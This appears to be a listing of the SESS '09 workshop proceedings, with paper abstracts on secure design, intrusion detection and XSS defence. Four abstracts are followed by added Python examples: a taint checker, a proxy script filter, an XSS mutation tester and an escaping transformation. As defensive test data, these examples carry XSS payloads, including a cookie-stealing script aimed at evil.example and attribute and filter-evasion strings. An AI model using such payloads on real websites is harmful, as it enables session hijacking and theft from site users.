ICSE Workshop on Software Engineering for Secure Systems (SESS '09), 2009

Date: 19 May 2009

  • [USB label]

    Publication Year: 2009, Page(s): c1
  • Welcome

    Publication Year: 2009, Page(s): c2
  • Hub page

    Publication Year: 2009, Page(s): 1
  • Table of contents

    Publication Year: 2009, Page(s): 1
  • Author index

    Publication Year: 2009, Page(s): 1 - 2
  • Detailed author index

    Publication Year: 2009, Page(s): 1 - 4
  • The end of indexes

    Publication Year: 2009, Page(s): 1
  • [PDF Reader FAQ and support]

    Publication Year: 2009, Page(s): 1
  • [PDF Reader FAQ and support]

    Publication Year: 2009, Page(s): 1 - 4
  • Release

    Publication Year: 2009, Page(s): 1
  • [Title page]

    Publication Year: 2009, Page(s): 1
  • Organizing Committee

    Publication Year: 2009, Page(s): 1
  • Reusable security use cases for mobile grid environments

    Publication Year: 2009, Page(s): 1 - 8
    Cited by: Papers (1)

    Due to the growing complexity of software development, developing software through systematic processes is becoming more and more important. Likewise, it is important that the development process used integrates security aspects from the first stages at the same level as other functional and non-functional requirements. In recent years, GRID technology has proven to be the most important one and ...
  • Resolving least privilege violations in software architectures

    Publication Year: 2009, Page(s): 9 - 16
    Cited by: Papers (4)

    Supporting a security principle, such as least privilege, in a software architecture is difficult. Systematic rules are lacking, and no guidance explains how to apply the principle in practice. As a result, security principles are often neglected. This lowers the overall security level of the software system, and the cost of fixing such problems later on in the development cycle is high. We propose an ...
  • Intrusion detection using signatures extracted from execution profiles

    Publication Year: 2009, Page(s): 17 - 24
    Cited by: Papers (1)

    An application based intrusion detection system is a security mechanism designed to detect malicious behavior that could compromise the security of a software application. Our aim is to develop such a system that operates on signatures extracted from execution profiles. These signatures are not descriptions of exploits, but instead are descriptions of the program conditions that lead to the exploi...
  • A hybrid analysis framework for detecting web application vulnerabilities

    Publication Year: 2009, Page(s): 25 - 32
    Cited by: Papers (3) | Patents (1)

    Increasingly, web applications handle sensitive data and interface with critical back-end components, but are often written by inexperienced programmers with low security skills. The majority of vulnerabilities that affect web applications can be ascribed to the lack of proper validation of user input before it is used as the argument of an output function. Several program analysis techniques ...
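    The observation at the heart of this abstract, that most web vulnerabilities are unvalidated input reaching an output function, is exactly what a static taint analysis checks. The block below is an added example, not code from the paper or its framework: a small taint tracker over Python source built on the standard ast module. The source, sink and sanitizer tables (request.args.get, render, cursor.execute, html.escape and so on) and the handler it analyses are constructed for illustration. The paper's framework is hybrid; only the static half, taint propagation from sources through assignments to sinks, is shown here.

```python
"""Static taint tracking over Python source with the standard ast module.
Added illustration: the sources, sinks and sanitizers below are hypothetical choices."""
import ast

# Untrusted-input producers, dangerous consumers, and calls that neutralise data in between.
SOURCES = {"request.args.get", "request.form.get", "input"}
SINKS = {"render", "cursor.execute", "os.system"}
SANITIZERS = {"html.escape", "int", "shlex.quote"}


class TaintAnalyzer(ast.NodeVisitor):
    """Statement-by-statement propagation: a variable is tainted after an assignment
    whose right-hand side carries untrusted data, and clean after any other assignment."""

    def __init__(self):
        self.tainted = set()   # names currently holding untrusted data
        self.findings = []     # (line, sink) pairs where tainted data reaches a sink

    def is_tainted(self, node):
        if isinstance(node, ast.Name):
            return node.id in self.tainted
        if isinstance(node, ast.Call):
            callee = ast.unparse(node.func)
            if callee in SOURCES:
                return True
            if callee in SANITIZERS:
                return False              # sanitizer output is trusted
            return any(self.is_tainted(a) for a in node.args)
        if isinstance(node, ast.JoinedStr):   # f-string: tainted if any {value} is
            return any(self.is_tainted(v.value) for v in node.values
                       if isinstance(v, ast.FormattedValue))
        if isinstance(node, ast.BinOp):       # concatenation, % formatting
            return self.is_tainted(node.left) or self.is_tainted(node.right)
        if isinstance(node, (ast.Attribute, ast.Subscript)):
            return self.is_tainted(node.value)
        return False                          # constants and anything not modelled

    def visit_Assign(self, node):
        for target in node.targets:
            if isinstance(target, ast.Name):
                if self.is_tainted(node.value):
                    self.tainted.add(target.id)
                else:
                    self.tainted.discard(target.id)   # overwritten with clean data
        self.generic_visit(node)

    def visit_Call(self, node):
        callee = ast.unparse(node.func)
        if callee in SINKS and any(self.is_tainted(a) for a in node.args):
            self.findings.append((node.lineno, callee))
        self.generic_visit(node)


def find_taint_flows(source):
    """Return [(line, sink), ...] for every sink call fed by unsanitized input."""
    analyzer = TaintAnalyzer()
    analyzer.visit(ast.parse(source))
    return analyzer.findings


# Constructed handler: two flows are sanitized (lines 3 and 6), two are not (lines 4 and 7).
HANDLER = '''name = request.args.get("name")
safe = html.escape(name)
render("<p>Hello " + safe + "</p>")
render("<p>Hello " + name + "</p>")
uid = int(request.args.get("id"))
cursor.execute("SELECT * FROM users WHERE id = %s" % uid)
cursor.execute(f"SELECT * FROM users WHERE name = '{name}'")
'''

if __name__ == "__main__":
    for line, sink in find_taint_flows(HANDLER):
        print(f"line {line}: unsanitized input reaches {sink}()")
```

    The analysis is deliberately simple: it is intraprocedural, ignores control flow, and treats any call it does not know as neutral, which is where the dynamic side of a hybrid framework earns its place.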
  • SWAP: Mitigating XSS attacks using a reverse proxy

    Publication Year: 2009, Page(s): 33 - 39
    Cited by: Papers (20)

    Due to the increasing amount of Web sites offering features to contribute rich content, and the frequent failure of Web developers to properly sanitize user input, cross-site scripting prevails as the most significant security threat to Web applications. Using cross-site scripting techniques, miscreants can hijack Web sessions, and craft credible phishing sites. Previous work towards protecting ag...
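    As an added illustration of the reverse-proxy idea in this abstract (not SWAP's own mechanism or code, which the abstract does not describe): a response filter of the kind a proxy in front of the application could apply. It assumes the proxy knows which scripts the application legitimately emits, here an allow-list of external script URLs and SHA-256 hashes of inline script bodies, both hypothetical; every other script element, every on* handler attribute and every javascript: URL is removed from the response and recorded as a detection. The response body is constructed.

```python
"""Allow-list script filter of the kind a reverse proxy could apply to HTML responses.
Added illustration; the allow-list contents and the response below are constructed."""
import hashlib
import html
from html.parser import HTMLParser


class ScriptAllowListFilter(HTMLParser):
    """Copy an HTML response through, dropping scripts the application is not known to
    emit, inline event handlers and javascript: URLs. Removals land in self.detections."""

    def __init__(self, allowed_inline_hashes, allowed_src):
        super().__init__(convert_charrefs=False)   # keep &amp; etc. verbatim in the output
        self.allowed_inline_hashes = set(allowed_inline_hashes)
        self.allowed_src = set(allowed_src)
        self.out = []
        self.detections = []
        self._script = None   # (start tag text, attrs, body chunks) while inside <script>

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script = (self.get_starttag_text(), dict(attrs), [])
            return
        self._emit_filtered_tag(tag, attrs, self_closing=False)

    def handle_startendtag(self, tag, attrs):
        if tag == "script":                       # <script .../>: treat as open + close
            self.handle_starttag(tag, attrs)
            self.handle_endtag(tag)
            return
        self._emit_filtered_tag(tag, attrs, self_closing=True)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            start_text, attrs, chunks = self._script
            self._script = None
            body = "".join(chunks)
            if "src" in attrs:
                allowed = attrs["src"] in self.allowed_src
            else:
                digest = hashlib.sha256(body.strip().encode()).hexdigest()
                allowed = digest in self.allowed_inline_hashes
            if allowed:
                self.out.append(start_text + body + "</script>")
            else:
                self.detections.append("script not on allow-list")
            return
        self.out.append(f"</{tag}>")

    def _emit_filtered_tag(self, tag, attrs, self_closing):
        kept = []
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.detections.append(f"event handler attribute {name} on <{tag}>")
            elif value is not None and value.strip().lower().startswith("javascript:"):
                self.detections.append(f"javascript: URL in <{tag} {name}>")
            else:
                kept.append((name, value))
        if len(kept) == len(attrs):
            self.out.append(self.get_starttag_text())   # nothing removed: copy verbatim
            return
        parts = [tag] + [n if v is None else f'{n}="{html.escape(v, quote=True)}"' for n, v in kept]
        self.out.append("<" + " ".join(parts) + (" />" if self_closing else ">"))

    # Everything else passes through unchanged.
    def handle_data(self, data):
        if self._script is not None:
            self._script[2].append(data)
        else:
            self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def filter_response(body, app_inline_scripts, app_script_srcs):
    """Return (filtered_html, detections) for one response body."""
    hashes = {hashlib.sha256(s.strip().encode()).hexdigest() for s in app_inline_scripts}
    flt = ScriptAllowListFilter(hashes, app_script_srcs)
    flt.feed(body)
    flt.close()
    return "".join(flt.out), flt.detections


# Hypothetical allow-list: what the application is known to emit.
APP_SCRIPTS = ["document.getElementById('greeting').focus();"]
APP_SRC = ["/static/app.js"]

# Constructed response: the application's own scripts plus three injected payloads.
RESPONSE = (
    '<html><body>'
    '<script src="/static/app.js"></script>'
    "<script>document.getElementById('greeting').focus();</script>"
    '<p id="greeting">Hello <b>alice</b> &amp; friends</p>'
    '<div class="comment"><script>document.location="http://evil.example/?c="+document.cookie</script></div>'
    '<img src="x" onerror="alert(1)">'
    '<a href="javascript:alert(2)">click</a>'
    '</body></html>'
)

if __name__ == "__main__":
    filtered, detections = filter_response(RESPONSE, APP_SCRIPTS, APP_SRC)
    print(filtered)
    print(detections)
```

    The allow-list is the weak point of any such filter: a page whose legitimate scripts change per request (nonces, inline JSON state) needs the application to tell the proxy what it emitted, which is what makes the approach a cooperation between proxy and application rather than a drop-in appliance.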
  • Metamodel for privacy policies within SOA

    Publication Year: 2009, Page(s): 40 - 46
    Cited by: Papers (5)

    As service-oriented architecture (SOA) continues to grow as a viable approach to systems development, so too does the number of services available. The strength of services in an SOA environment to provide interoperability comes at the cost of reduced privacy, as more interactions between autonomous services require more information to be exchanged. In this paper we define a metamodel for privacy ...
  • MUTEC: Mutation-based testing of Cross Site Scripting

    Publication Year: 2009, Page(s): 47 - 53
    Cited by: Papers (19) | Patents (1)

    Cross Site Scripting (XSS) is one of the worst vulnerabilities that allow malicious attacks such as cookie thefts and Web page defacements. Testing an implementation against XSS vulnerabilities (XSSVs) can avoid these consequences. Obtaining an adequate test data set is essential for testing of XSSVs. An adequate test data set contains effective test cases that can reveal XSSVs. Unfortunately, tra...
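    To make the mutation-testing idea concrete, here is an added example, not MUTEC itself: a toy comment renderer with a correct sanitizer, five hand-written mutants that each model a common XSS-defence defect (hypothetical operators chosen for illustration), and a scoring function that reports which mutants a given test data set kills. A mutant is killed when its rendered output differs from the correct program's on some test input. Both test sets are constructed; the point is that only a set containing attack vectors for each output context kills every mutant, which is what the abstract calls an adequate test data set.

```python
"""Mutation analysis of an XSS sanitizer: which test inputs reveal which defect?
Added illustration; the mutation operators below are hypothetical, not MUTEC's."""
import html
import re


def sanitize(text):
    """Correct sanitizer: escapes &, <, >, \" and ' so text is inert in element and attribute context."""
    return html.escape(text, quote=True)


def render_comment(text, sanitizer=sanitize):
    """Program under test: user text lands both in an attribute and in element content."""
    safe = sanitizer(text)
    return f'<div class="comment" title="{safe}">{safe}</div>'


# Each mutant replaces the sanitizer with a typical XSS-defence defect.
MUTANTS = {
    "drop_escape": lambda t: t,                                          # sanitizer call removed
    "no_quote_escape": lambda t: html.escape(t, quote=False),            # quotes left alone
    "first_occurrence_only": lambda t: t.replace("<", "&lt;", 1).replace(">", "&gt;", 1),
    "lowercase_blocklist": lambda t: t.replace("<script", "").replace("</script", ""),
    "strip_tags_regex": lambda t: re.sub(r"<[^>]*>", "", t),              # single-pass tag stripper
}


def mutation_score(tests, mutants=MUTANTS):
    """Return ({mutant: [killing inputs]}, killed / total). A mutant is killed when its
    rendered output differs from the correct program's on some test input."""
    killed = {}
    for name, mutant in mutants.items():
        killers = [t for t in tests if render_comment(t, mutant) != render_comment(t)]
        if killers:
            killed[name] = killers
    return killed, len(killed) / len(mutants)


# Constructed test data sets.
BENIGN_TESTS = ["hello", "good morning", "see you at 5"]
ATTACK_TESTS = [
    "<script>alert(1)</script>",            # element context
    '" onmouseover="alert(1)',              # attribute context: breaks out of title="..."
    "<scr<script>ipt>alert(1)</script>",    # survives single-pass stripping
    "<SCRIPT>alert(1)</SCRIPT>",            # survives case-sensitive keyword filters
]

if __name__ == "__main__":
    for label, tests in (("benign", BENIGN_TESTS), ("attack", ATTACK_TESTS)):
        killed, score = mutation_score(tests)
        print(f"{label}: score {score:.2f}, killed {sorted(killed)}")
```

    Running the block shows the benign set killing nothing and the attack set killing all five; the element-context payload on its own leaves no_quote_escape alive, which is the kind of gap mutation analysis is meant to expose.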
  • RUP-based process model for security requirements engineering in value-added service development

    Publication Year: 2009, Page(s): 54 - 60
    Cited by: Papers (1)

    Due to the spread of SMS services and the appearance of new business models, value-added SMS services have been introduced. According to research results on the wide distribution of security incidents in ICT systems worldwide, in spite of known security solutions, there is a need for an organizational approach to implementing security. This paper presents research and development efforts in buildi...
  • Improving perimeter security with security-oriented program transformations

    Publication Year: 2009, Page(s): 61 - 67
    Cited by: Papers (3)

    A security-oriented program transformation maps programs to security-augmented programs, i.e. it introduces a protection mechanism to make programs more secure. Our previous work defined security-oriented program transformations [6], introduced a catalog of transformations [8], and showed how program transformations could be applied to systematically eradicate various types of data injection attac...
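    An added example of a security-oriented program transformation in the abstract's sense (not the catalog from the paper, whose transformations and target language the abstract does not state): an ast.NodeTransformer that rewrites every call to a hypothetical HTML output function render(...) so that the dynamic parts of its argument pass through html.escape, while literal template text and already-escaped values are left alone, and then inserts the import the rewritten program needs. The sample program and the payload are constructed; running both versions side by side shows the injection disappearing.

```python
"""Security-oriented program transformation: escape dynamic data at HTML sinks.
Added illustration; render() is a hypothetical output function, not from the paper."""
import ast
import html

SINKS = {"render"}            # output functions whose arguments must be HTML-safe
SANITIZER = "html.escape"     # a call that already makes data safe


class EscapeDynamicParts(ast.NodeTransformer):
    """For every sink call, wrap each non-literal sub-expression of its arguments in
    html.escape(..., quote=True), leaving literal template text untouched."""

    def visit_Call(self, node):
        self.generic_visit(node)                 # transform nested calls first
        if ast.unparse(node.func) in SINKS:
            node.args = [self._protect(a) for a in node.args]
        return node

    def _protect(self, expr):
        if isinstance(expr, ast.Constant):
            return expr                          # static markup written by the developer
        if isinstance(expr, ast.BinOp):          # "..." + x, "..." % x: protect the operands
            expr.left, expr.right = self._protect(expr.left), self._protect(expr.right)
            return expr
        if isinstance(expr, ast.Tuple):          # "%s %s" % (a, b)
            expr.elts = [self._protect(e) for e in expr.elts]
            return expr
        if isinstance(expr, ast.JoinedStr):      # f-string: protect each {value}
            for part in expr.values:
                if isinstance(part, ast.FormattedValue):
                    part.value = self._protect(part.value)
            return expr
        if isinstance(expr, ast.Call) and ast.unparse(expr.func) == SANITIZER:
            return expr                          # already escaped: do not double-encode
        return ast.Call(
            func=ast.Attribute(value=ast.Name(id="html", ctx=ast.Load()), attr="escape", ctx=ast.Load()),
            args=[expr],
            keywords=[ast.keyword(arg="quote", value=ast.Constant(value=True))],
        )


def harden(source):
    """Return the transformed program text, with `import html` added if it is missing."""
    tree = EscapeDynamicParts().visit(ast.parse(source))
    has_import = any(isinstance(n, ast.Import) and any(a.name == "html" for a in n.names)
                     for n in tree.body)
    if not has_import:
        tree.body.insert(0, ast.Import(names=[ast.alias(name="html")]))
    return ast.unparse(ast.fix_missing_locations(tree))


def run(source, payload):
    """Execute a program defining page(name), with a stand-in render() that returns its argument."""
    env = {"render": lambda s: s, "html": html}
    exec(source, env)
    return env["page"](payload)


# Constructed program: three output statements, only the last one escapes its data.
PROGRAM = '''def page(name):
    out = []
    out.append(render("<h1>Hello " + name + "</h1>"))
    out.append(render(f'<p title="{name}">{name.upper()}</p>'))
    out.append(render(html.escape(name)))
    return out
'''
PAYLOAD = '"><script>alert(1)</script>'

if __name__ == "__main__":
    print(harden(PROGRAM))
    for before, after in zip(run(PROGRAM, PAYLOAD), run(harden(PROGRAM), PAYLOAD)):
        print(before, "->", after)
```

    Escaping at the sink is context-blind: it is right for element content and quoted attribute values, but a value placed inside a script block or a URL needs a different encoder, which is why a real catalog of transformations carries one transformation per output context rather than one for all.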
  • Generating formal specifications for security-critical applications - A model-driven approach

    Publication Year: 2009, Page(s): 68 - 74
    Cited by: Papers (9)

    The SecureMDD approach aims to generate both a formal specification for verification and executable code from UML diagrams. The UML models define the static as well as the dynamic components of the system under development. This model-driven approach is focused on security-critical applications that are based on cryptographic protocols, especially Java Card applications. In this paper we describe th...